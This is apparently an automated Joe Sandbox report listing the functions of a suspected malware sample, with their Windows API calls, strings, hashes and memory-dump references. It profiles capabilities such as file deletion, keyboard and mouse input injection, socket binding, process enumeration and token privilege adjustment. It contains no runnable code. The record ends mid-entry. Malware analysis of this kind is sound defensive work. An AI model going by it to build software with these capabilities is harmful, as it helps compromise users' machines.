Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: cb2f7ee2ccf11134c112698249c12c35a3e2ec945608d28acb34dd11bdb1c847
Instruction ID: f813905551a25aa56ba2c17d7df4046bd9843dfdd811ef04218a029d6804b95a
Opcode Fuzzy Hash: cb2f7ee2ccf11134c112698249c12c35a3e2ec945608d28acb34dd11bdb1c847
Instruction Fuzzy Hash: 76C128719242069FCB269F789855AEA7BF8EF61310F24419AE854D7251DB308EF18B90

Function 0024D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2

Part of subcall function 0024E199: GetFileAttributesW.KERNEL32(?,0024CF95), ref: 0024E19A

FindFirstFileW.KERNEL32(?,?), ref: 0024D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0024D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0024D481
FindClose.KERNEL32(00000000), ref: 0024D498
FindClose.KERNEL32(00000000), ref: 0024D4A1

Strings

\*.*, xrefs: 0024D3F2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: cf4f56ad4637520f417ce693e25b6275581d028e48a5062c943aefc253a0d950
Instruction ID: 3c56a6f3371eef96e0e2533653d40312eb770fa7ec04542dc226568f7a1db9c8
Opcode Fuzzy Hash: cf4f56ad4637520f417ce693e25b6275581d028e48a5062c943aefc253a0d950
Instruction Fuzzy Hash: 4A3181310187859FC304EF65D8958AFB7E8BEA1314F844A1DF4D593192EB30AA59CB63

Function 0021E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0021E645

Strings

1#QNAN, xrefs: 0021F84B
1#IND, xrefs: 0021F83D
1#SNAN, xrefs: 0021F844
1#INF, xrefs: 0021F852

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: c4f59013068247d74066df05b664ba293836b16cadd5f40b0ec9c09bdc50985b
Instruction ID: 3c41e477abd536ce51dc8062f27d8c5b2fc6508d435c9a4364259f16ff76dc7f
Opcode Fuzzy Hash: c4f59013068247d74066df05b664ba293836b16cadd5f40b0ec9c09bdc50985b
Instruction Fuzzy Hash: F1C25A71E282298FDF64CE289D447EAB7F5EB58304F1541EAD81DE7280E774AE918F40

Function 0025648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002564DC
CoInitialize.OLE32(00000000), ref: 00256639
CoCreateInstance.OLE32(0027FCF8,00000000,00000001,0027FB68,?), ref: 00256650
CoUninitialize.OLE32 ref: 002568D4

Strings

.lnk, xrefs: 002564BA, 00256524, 002565E0

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: c584f0c1aef53b684964a9965099f7dbc87e9167c9db6ee0c287006f4f16b2b6
Instruction ID: 34373bfd2d65f6e0ddb67cbfeb63ec3883a382baf5bc6c6c126cf95d782e0e79
Opcode Fuzzy Hash: c584f0c1aef53b684964a9965099f7dbc87e9167c9db6ee0c287006f4f16b2b6
Instruction Fuzzy Hash: 23D179715186419FD310EF24C885D6BB7E8FFA9304F50496DF4958B2A1EB30EE09CB92

Function 002622DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 002622E8

Part of subcall function 0025E4EC: GetWindowRect.USER32(?,?), ref: 0025E504

GetDesktopWindow.USER32 ref: 00262312
GetWindowRect.USER32(00000000), ref: 00262319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00262355
GetCursorPos.USER32(?), ref: 00262381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002623DF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 037f9b08e03d3d1ddb2f0f5505404a7dcb96a586f08c8c70ec321fecff579d86
Instruction ID: ed68fbbbb96e9dc5e7dd5175369f07b1c64d55c43b192948f1b59e7d6f982f19
Opcode Fuzzy Hash: 037f9b08e03d3d1ddb2f0f5505404a7dcb96a586f08c8c70ec321fecff579d86
Instruction Fuzzy Hash: 7A3105725057159FDB20DF24D849F5BBBA9FF84310F10091DF98897281DB34EA68CB92

Function 00259B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00259B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00259C8B

Part of subcall function 00253874: GetInputState.USER32 ref: 002538CB
Part of subcall function 00253874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00253966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00259BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00259C75

Strings

*.*, xrefs: 00259B5D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 07f1d8008a76929f1f36bf88ec61faf338666d769f55a07c2325c4120ca4e000
Instruction ID: 094276c392b0a3a2a113dc403fb01836e0f6c2ddbb719b2cda9cea433754ec5b
Opcode Fuzzy Hash: 07f1d8008a76929f1f36bf88ec61faf338666d769f55a07c2325c4120ca4e000
Instruction Fuzzy Hash: E641747191060ADFDF14DF64D849AEE7BB8EF19312F244056E805A3191DB309E98CF64

Function 001F997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 001F9A4E
GetSysColor.USER32(0000000F), ref: 001F9B23
SetBkColor.GDI32(?,00000000), ref: 001F9B36

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 9d67ba52670f5fb687bf36021d9f9e5a2b94b7e78ccd6309d9413a52713ca92a
Instruction ID: 9d0e8e2d7a353ccb7bbc946192a7eb8cb8267a780b2e8db38351b346a050099d
Opcode Fuzzy Hash: 9d67ba52670f5fb687bf36021d9f9e5a2b94b7e78ccd6309d9413a52713ca92a
Instruction Fuzzy Hash: 45A12AF0128549BFEB38BE3C9C69F7B269DEB82340F15420AF612C7591CB259D61C671

Function 00261806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0026304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0026307A
Part of subcall function 0026304E: _wcslen.LIBCMT ref: 0026309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0026185D
WSAGetLastError.WSOCK32 ref: 00261884
bind.WSOCK32(00000000,?,00000010), ref: 002618DB
WSAGetLastError.WSOCK32 ref: 002618E6
closesocket.WSOCK32(00000000), ref: 00261915

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 651f180cfc58e5a9817a1a905a8d77dcd24dbff0be5b5f46ba023b7cfd55028d
Instruction ID: cc9834f15fe0a1ce9d5ec42b98f82ec7fad4072b42e8ae8903f908fdd4074ed5
Opcode Fuzzy Hash: 651f180cfc58e5a9817a1a905a8d77dcd24dbff0be5b5f46ba023b7cfd55028d
Instruction Fuzzy Hash: 0251B471A006009FE710AF24D88AF2A77E5AF54718F58845CF91A9F3D3C771AD928BA1

Function 00271C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00271CC0
IsWindowEnabled.USER32 ref: 00271CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00271CDB
IsIconic.USER32 ref: 00271CE9
IsZoomed.USER32 ref: 00271CF7

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 95948d43267f2f8838a25d128200292f2dd91e350036735f6cffb981d41e7c85
Instruction ID: 9db16ae977d9d2c9181dd0b041b1ddf1e0131a0cfc6e915c3f2f8dfaeb55dc05
Opcode Fuzzy Hash: 95948d43267f2f8838a25d128200292f2dd91e350036735f6cffb981d41e7c85
Instruction Fuzzy Hash: AE21D3317502119FD7218F6ED888B2A7BA5EF95314F19C05DE84E8B351CB71DC62CB91

Function 001E8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00225DF0
VUUU, xrefs: 001E83E8
VUUU, xrefs: 001E83FA
VUUU, xrefs: 001E843C
ERCP, xrefs: 001E813C

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 8910d12239026c40309fb8016c5fc10b3af9a2e4528c6e1684c823e34a7daefd
Instruction ID: 028a3ed68722c958dcf2b8e2eee953ef6c311c3f98e98a0493ffd13ed66f0f70
Opcode Fuzzy Hash: 8910d12239026c40309fb8016c5fc10b3af9a2e4528c6e1684c823e34a7daefd
Instruction Fuzzy Hash: 26A2E371E10A6ADBDF24CF99D8447ADB3B1FF54310F2581AAE819A7284EB309D91CF50

Function 00248298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002482AA

Strings

(, xrefs: 002482F0
|, xrefs: 002482DA
tb*, xrefs: 002484F4

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: lstrlen
String ID: ($tb*$|
API String ID: 1659193697-4261382565
Opcode ID: 50c345ee2a4538c1680311a211fa1ca369887607a5493f573adbf644b758275f
Instruction ID: f4e3ae4460a2c79c2ef8c2e352a655aa32caeaf740ddc38c7a082229ce636bb4
Opcode Fuzzy Hash: 50c345ee2a4538c1680311a211fa1ca369887607a5493f573adbf644b758275f
Instruction Fuzzy Hash: 76323875A20606DFC728CF19C480A6AB7F0FF48710B15C56EE59ADB3A1EB70E991CB40

Function 0026A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0026A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0026A6BA

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0026A79C
CloseHandle.KERNEL32(00000000), ref: 0026A7AB

Part of subcall function 001FCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00223303,?), ref: 001FCE8A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: eb97b340b4d694e052e88cd4bd9ddc1a4d4bf851367e23c93884e51b1912e50a
Instruction ID: 651879bf56cf03d3fdf0a25849e340062bb8b2bcc77f0ee7d9728ed07d6903aa
Opcode Fuzzy Hash: eb97b340b4d694e052e88cd4bd9ddc1a4d4bf851367e23c93884e51b1912e50a
Instruction Fuzzy Hash: E0517A71508740AFD310EF25D886A6FBBE8FF99744F40492DF589972A2EB30D944CB92

Function 0024AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0024AAAC
SetKeyboardState.USER32(00000080), ref: 0024AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0024AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0024AB88

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 00ec61882b5a5daffed99fa8f4ce3b084c4222fed7259b3b1c8d880534dd4232
Instruction ID: ba6b275a216537693cfaab1e7cc3f56d760c817d4bfefda7112f3a8a02a28ede
Opcode Fuzzy Hash: 00ec61882b5a5daffed99fa8f4ce3b084c4222fed7259b3b1c8d880534dd4232
Instruction Fuzzy Hash: 65313D30AE0209AEFF3DCF64CC05BFA77A6EB64314F14421AF585561D0D3B589A1C752

Function 0025CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0025CE89
GetLastError.KERNEL32(?,00000000), ref: 0025CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0025CEFE

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: ed4ddd1aa23b92d4a3d390418ffb9c9c965a42ab2c2b9b06ebfca6ebe39c15e8
Instruction ID: a9c4625f8d733bf2c5314e915d81a87604c59ce6f93fbb2c910324eea678d998
Opcode Fuzzy Hash: ed4ddd1aa23b92d4a3d390418ffb9c9c965a42ab2c2b9b06ebfca6ebe39c15e8
Instruction Fuzzy Hash: D821F1B15103069FDB20CF65D949BA777FCEB10315F20441EE946E2151E770ED58CB58

Function 00255C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00255CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00255D17
FindClose.KERNEL32(?), ref: 00255D5F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: a5476cc889da1ba161ea3f4d1e605cf291f347881a9de85eb4eaf6989ddae0ed
Instruction ID: af10e72a3b1d324ba63c778d6a4c435339c40f01d7f6c41e76e8beabccbcebc1
Opcode Fuzzy Hash: a5476cc889da1ba161ea3f4d1e605cf291f347881a9de85eb4eaf6989ddae0ed
Instruction Fuzzy Hash: C2518A35614A029FC714CF28C4A4A9AB7F4FF49324F14855EE95A8B3A2CB30ED59CF91

Function 00212622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0021271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00212724
UnhandledExceptionFilter.KERNEL32(?), ref: 00212731

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2bb1f8668870df62cf5b9c6df51976fcbb6d44a0dc06ee3e110a1ef98e0f9362
Instruction ID: a8298fee9d1ce68c6f00dd94779f338f9361b9b83385f36bf7f981d75a44e03f
Opcode Fuzzy Hash: 2bb1f8668870df62cf5b9c6df51976fcbb6d44a0dc06ee3e110a1ef98e0f9362
Instruction Fuzzy Hash: 2E31D5749113289BCB21DF68DC887DDB7B8AF18310F5041EAE80CA72A1EB309F958F45

Function 002551CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002551DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00255238
SetErrorMode.KERNEL32(00000000), ref: 002552A1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: a7c61dc76481fb97ecaa7dd7ea304a69d805914ebcee41de1b5853cfccfef574
Instruction ID: da70eaa79402d0adfb72432ab76573e160a93110662492b4694a348d67ff13c9
Opcode Fuzzy Hash: a7c61dc76481fb97ecaa7dd7ea304a69d805914ebcee41de1b5853cfccfef574
Instruction Fuzzy Hash: F6314F75A10518DFDB00DF54D898EADBBB4FF49314F148099E8099B362DB31E856CB90

Function 002416C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 001FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00200668
Part of subcall function 001FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00200685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0024170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0024173A
GetLastError.KERNEL32 ref: 0024174A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: f5edd1e34a49bdd2d8a425abdc67f2d16b1b76141c1e481235d67ed2316bc1db
Instruction ID: a932103579dca727ad905edc04bf862e17b0f0a3cb95a3f4daf772a2242caef7
Opcode Fuzzy Hash: f5edd1e34a49bdd2d8a425abdc67f2d16b1b76141c1e481235d67ed2316bc1db
